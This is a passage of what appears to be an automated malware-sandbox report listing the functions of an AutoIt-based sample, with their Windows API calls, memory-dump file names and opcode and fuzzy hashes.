                                                                                      Function 00C2F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00C2F953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00C6F3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00C6F454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: f513e7348c62dc5316ceba69ebbb2a19c1301ce6e6046ef91f3830d152474229
                                                                                      • Instruction ID: c837cfa8e49f02a3792685daf80fa939e39b40f2da5ab7f1859378aeb65d8905
                                                                                      • Opcode Fuzzy Hash: f513e7348c62dc5316ceba69ebbb2a19c1301ce6e6046ef91f3830d152474229
                                                                                      • Instruction Fuzzy Hash: C6412C31608698BAC738AB2EB8C873E7BB1AB56314F14443CE09757D61CA719AC3D710
                                                                                      Function 00CA2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00CA2D1B
                                                                                      • GetDC.USER32(00000000), ref: 00CA2D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA2D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00CA2D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CA2D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CA2D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CA5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00CA2DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CA2DE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: a4a6a0c544bd4e8334224b536dac4192eed612231f7b1eb83db6214986056e62
                                                                                      • Instruction ID: 0fb0b192d7fdc5515736e2de706bde06d2892b36f6b7261c6b4282221677862d
                                                                                      • Opcode Fuzzy Hash: a4a6a0c544bd4e8334224b536dac4192eed612231f7b1eb83db6214986056e62
                                                                                      • Instruction Fuzzy Hash: 6B314C72201224BFEB118F54CC8AFEB3BA9EF0A759F044055FE089B291D6759D51CBA4
                                                                                      Function 00C75622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: 7eee89c95325a95b595f949d64401df41a4bf99667ea7631d80a5f0de7e0e15f
                                                                                      • Instruction ID: 90a9bfa523fe7cb66ba7d0a37d232a69eef724b474a6ad45410f0a9cacac4feb
                                                                                      • Opcode Fuzzy Hash: 7eee89c95325a95b595f949d64401df41a4bf99667ea7631d80a5f0de7e0e15f
                                                                                      • Instruction Fuzzy Hash: 8F210BA1750A0A7BD21855228D82FFB335CAF21398F488034FD1C9A781FBB1EF1195E5
                                                                                      Function 00C94FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      • Opcode ID: f75ba5c51520c13010fc85bfd8df4b89ded5d80fcf46c404ecaebbf90d4c1117
                                                                                      • Instruction ID: a381865ba70646c0a07ffb658e34be84c216466532cf3f7af73067c68a104e51
                                                                                      • Opcode Fuzzy Hash: f75ba5c51520c13010fc85bfd8df4b89ded5d80fcf46c404ecaebbf90d4c1117
                                                                                      • Instruction Fuzzy Hash: 05D1D471A0060A9FDF11CFA8C889FAEB7B5FF48344F148169E925AB291E770DE45CB50
                                                                                      Function 00C51522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C515CE
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51651
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C517FB,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C516E4
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C516FB
                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51777
                                                                                      • __freea.LIBCMT ref: 00C517A2
                                                                                      • __freea.LIBCMT ref: 00C517AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2829977744-0
                                                                                      • Opcode ID: dcf1bf6a3eb61a1a99653380de49a234ade551a56d5b55b11ae339aaf4b017d3
                                                                                      • Instruction ID: 1e9a8bf1f542ec26c4663785e48b04e8f2e52d87f997a7382f88a717da6ef88d
                                                                                      • Opcode Fuzzy Hash: dcf1bf6a3eb61a1a99653380de49a234ade551a56d5b55b11ae339aaf4b017d3
                                                                                      • Instruction Fuzzy Hash: 5191B379E002069ADB208E64C889BEE7BA5EB49351F5C0659EC11E7141EB35DE88C768
                                                                                      Function 00C94523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      • Opcode ID: 2371f05799ba08094c82d978fccd116141158e5a6d4fab16ff7ae6701cbd94a5
                                                                                      • Instruction ID: ae68826186965a194104b15d499114c54d13d503ffbf55311975ad511aaee550
                                                                                      • Opcode Fuzzy Hash: 2371f05799ba08094c82d978fccd116141158e5a6d4fab16ff7ae6701cbd94a5
                                                                                      • Instruction Fuzzy Hash: 7C919471A00219ABDF28CFA5D888FAE7BB8EF46715F108559F515AB280D7709942CFA0
                                                                                      Function 00C81187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C8125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C812A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C812D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C8135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C813C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C81430
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
                                                                                      • API String ID: 2550207440-0
                                                                                      • Opcode ID: 8c9794d313ef56ebe8df06a480acc9892b27d5acda359b81a321912778f85a5d
                                                                                      • Instruction ID: af883c478f994ef19ecd04ddc84113973f39256346aaa48cb53b8ec51c9b5325
                                                                                      • Opcode Fuzzy Hash: 8c9794d313ef56ebe8df06a480acc9892b27d5acda359b81a321912778f85a5d
                                                                                      • Instruction Fuzzy Hash: 6C910271A00218AFDB00EF94C884BBEB7F9FF45319F194029E910EB291D774E942DB98
                                                                                      Function 00C2948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 3722211da4197d8335889d59bead01fbb2abe060499f1455d66e32890fbe8c0a
                                                                                      • Instruction ID: daa4a189429b1f118013b290f58e9ad8faf771d79cde92db8ba1cd58097f4ce8
                                                                                      • Opcode Fuzzy Hash: 3722211da4197d8335889d59bead01fbb2abe060499f1455d66e32890fbe8c0a
                                                                                      • Instruction Fuzzy Hash: 15916871E00219EFCB10CFA9DC84AEEBBB8FF49320F148559E915B7251D378AA41DB60
                                                                                      Function 00C93947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C9396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C93A7A
                                                                                      • _wcslen.LIBCMT ref: 00C93A8A
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C93C1F
                                                                                        • Part of subcall function 00C80CDF: VariantInit.OLEAUT32(00000000), ref: 00C80D1F
                                                                                        • Part of subcall function 00C80CDF: VariantCopy.OLEAUT32(?,?), ref: 00C80D28
                                                                                        • Part of subcall function 00C80CDF: VariantClear.OLEAUT32(?), ref: 00C80D34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4137639002-1221869570
                                                                                      • Opcode ID: c5993585428f7e8d750642fc3336e546eb7321bc69238b6926913c144686b5c1
                                                                                      • Instruction ID: 9aa5a9f4648dfdcd15fc2ebcbc841e4b83edc6ac306afdef0c455f435ffec567
                                                                                      • Opcode Fuzzy Hash: c5993585428f7e8d750642fc3336e546eb7321bc69238b6926913c144686b5c1
                                                                                      • Instruction Fuzzy Hash: 919198746083419FCB00EF64C48496AB7E4FF89314F14892EF89A9B351DB30EE46DB92
                                                                                      Function 00C94BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C7000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?,?,00C7035E), ref: 00C7002B
                                                                                        • Part of subcall function 00C7000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70046
                                                                                        • Part of subcall function 00C7000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70054
                                                                                        • Part of subcall function 00C7000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?), ref: 00C70064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C94C51
                                                                                      • _wcslen.LIBCMT ref: 00C94D59
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C94DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00C94DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 614568839-2785691316
                                                                                      • Opcode ID: 672db2963c193229af4316c6d75588531374d2c0ff64d5f39899a2eb1783ef43
                                                                                      • Instruction ID: dbbae78feccd10028025debe4100a0f9e63dfa0d66dda1984dd6178cdd19795a
                                                                                      • Opcode Fuzzy Hash: 672db2963c193229af4316c6d75588531374d2c0ff64d5f39899a2eb1783ef43
                                                                                      • Instruction Fuzzy Hash: 15911671D00219EFDF14DFA4C895EEEB7B8BF09314F10816AE919A7291EB309A45DF60
                                                                                      Function 00CA20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 00CA2183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00CA21B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CA21DD
                                                                                      • _wcslen.LIBCMT ref: 00CA2213
                                                                                      • GetMenuItemID.USER32(?,?), ref: 00CA224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 00CA225B
                                                                                        • Part of subcall function 00C73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73A57
                                                                                        • Part of subcall function 00C73A3D: GetCurrentThreadId.KERNEL32 ref: 00C73A5E
                                                                                        • Part of subcall function 00C73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C725B3), ref: 00C73A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA22E3
                                                                                        • Part of subcall function 00C7E97B: Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 4196846111-0
                                                                                      • Opcode ID: 1095ded45972645de6b5102780c3901a674ffdcf337ddbbccaa00f4cd472cfec
                                                                                      • Instruction ID: e7a1a425effe4f2738ca43d521bcb1f700fa1329d0cc4cbd116fe97e2a50c56f
                                                                                      • Opcode Fuzzy Hash: 1095ded45972645de6b5102780c3901a674ffdcf337ddbbccaa00f4cd472cfec
                                                                                      • Instruction Fuzzy Hash: DB71B335E00216AFCB10DFA8C881BAEB7F5EF4A324F108458E916EB351D734EE419B90
                                                                                      Function 00C7AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00C7AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 00C7AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 00C7AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C7AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C7AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C7B020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 4688906ac090826a93ac113c9ed6df3857baef8a7de03b18c524953368b93084
                                                                                      • Instruction ID: 086114510bd47e1c4864d8aaa98ab49b208d0606d8a3fb019c38b90a88c483c1
                                                                                      • Opcode Fuzzy Hash: 4688906ac090826a93ac113c9ed6df3857baef8a7de03b18c524953368b93084
                                                                                      • Instruction Fuzzy Hash: C851C1E06087D53DFB3682748845BBEBEA95B46304F08C589E1ED958C3C398AED4D751
                                                                                      Function 00C7ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 00C7AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 00C7AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 00C7AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C7ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C7ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C7AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C7AE38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: e22d98b5cd12958a560b682b8196e8c42791b30e2d7002ee6ca49d5f856728cc
                                                                                      • Instruction ID: f6a44ab7ec1f8439095392ef2265719d83ea5371a11eca2a843f522b27594c7f
                                                                                      • Opcode Fuzzy Hash: e22d98b5cd12958a560b682b8196e8c42791b30e2d7002ee6ca49d5f856728cc
                                                                                      • Instruction Fuzzy Hash: 4951D6A15047D53DFB3683348C95BBE7EA96B86300F08C489E1ED468C3D294EE94E752
                                                                                      Function 00C4542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00C53CD6,?,?,?,?,?,?,?,?,00C45BA3,?,?,00C53CD6,?,?), ref: 00C45470
                                                                                      • __fassign.LIBCMT ref: 00C454EB
                                                                                      • __fassign.LIBCMT ref: 00C45506
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00C53CD6,00000005,00000000,00000000), ref: 00C4552C
                                                                                      • WriteFile.KERNEL32(?,00C53CD6,00000000,00C45BA3,00000000,?,?,?,?,?,?,?,?,?,00C45BA3,?), ref: 00C4554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,00C45BA3,00000000,?,?,?,?,?,?,?,?,?,00C45BA3,?), ref: 00C45584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
